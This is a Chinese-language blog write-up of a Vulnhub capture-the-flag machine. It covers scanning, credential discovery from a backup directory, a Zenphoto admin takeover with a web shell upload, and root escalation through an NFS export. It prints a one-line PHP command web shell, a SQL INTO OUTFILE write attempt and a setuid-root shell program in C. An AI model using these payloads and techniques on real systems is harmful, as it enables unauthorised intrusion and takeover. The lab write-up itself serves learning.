带妹玩转Vulnhub【十一】

前言

国庆第四天œ∑´

千金散尽还复来

开始

主机发现

netdiscover -r 192.168.43.0/24

在这里插入图片描述

端口扫描

nmap -A -p- -T4 192.168.43.232

在这里插入图片描述

渗透测试

80端口查看,emm没什么发现,针对smb服务我们可以使用enum4linux进行扫描,同样的使用dirb扫描一下目录

在这里插入图片描述

在这里插入图片描述

可以看到backup目录,可以看到这应该是个网站的源码,下载下来,但是ssh.bak下载不下来,应该是权限的问题,可以看到数据库的用户名和密码,我们可以通过此登录phpmyadmin

在这里插入图片描述

我们尝试通过上传一个php shellweb
select "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"
此时出现如下报错信息#1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

在这里插入图片描述

可以去百度一下,大概意思就是文件的操作权限和用户所拥有的权限是一样的。因此phpmyadmin这条路大概是走不通了。
这里我需要推荐一个字典列表这是别人收集整理的,感觉十分的好用。

接下来我们访问http://192.168.43.236/zenphoto/网站看看有什么发现。
这是一个zenphoto的网站

在这里插入图片描述

关于这个框架的漏洞我们找到了很多。

在这里插入图片描述
但是经过尝试,似乎并没有这么麻烦,通过之前拿到的数据库的用户名和密码,进行登录,然后新建一个管理员进行登录,可以看到有一个上传按钮,我们可以通过上传一个shell然后访问即可。

在这里插入图片描述

使用msf生成shell,并建立连接

在这里插入图片描述

在这里插入图片描述

接下来就是需要提权获取root权限了,中间有一下flag我就不进行获取了,反正最终的目的是为了获取root权限。
我测试了许多本地提权漏洞,但好像都过于麻烦,并且不起作用,经过查看WP,我发现我们可以通过NSF来达到我们的目的。
首先需要安装NSF服务
apt-get install nfs-common

如下命令showmount --exports 192.168.43.236,显示远程nsf所挂在的文件夹
monut -t nsf 192.168.43.236:/tmp /tmp/nsf将远程文件夹挂在到本地
通过msf上传shell.c

int main(void){
       setresuid(0, 0, 0);
       system("/bin/bash");
}

并生成gcc shell.c -o shell文件,通过挂载在kali
chown root:root shell
chmod 4777 shell
然后回到www-data中运行shell程序,即可获取到root
这里我只想说明一下chmod 4777 shell的作用
可以参考这里

在这里插入图片描述

4代表setuid也就是告诉操作系统,你使用该程序所有者的权限去运行它,所以我们可以通过此获取到root权限。

总结

好好赚钱,挣钱养家?,包养萌妹,走向人生巅峰?

参考文章

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值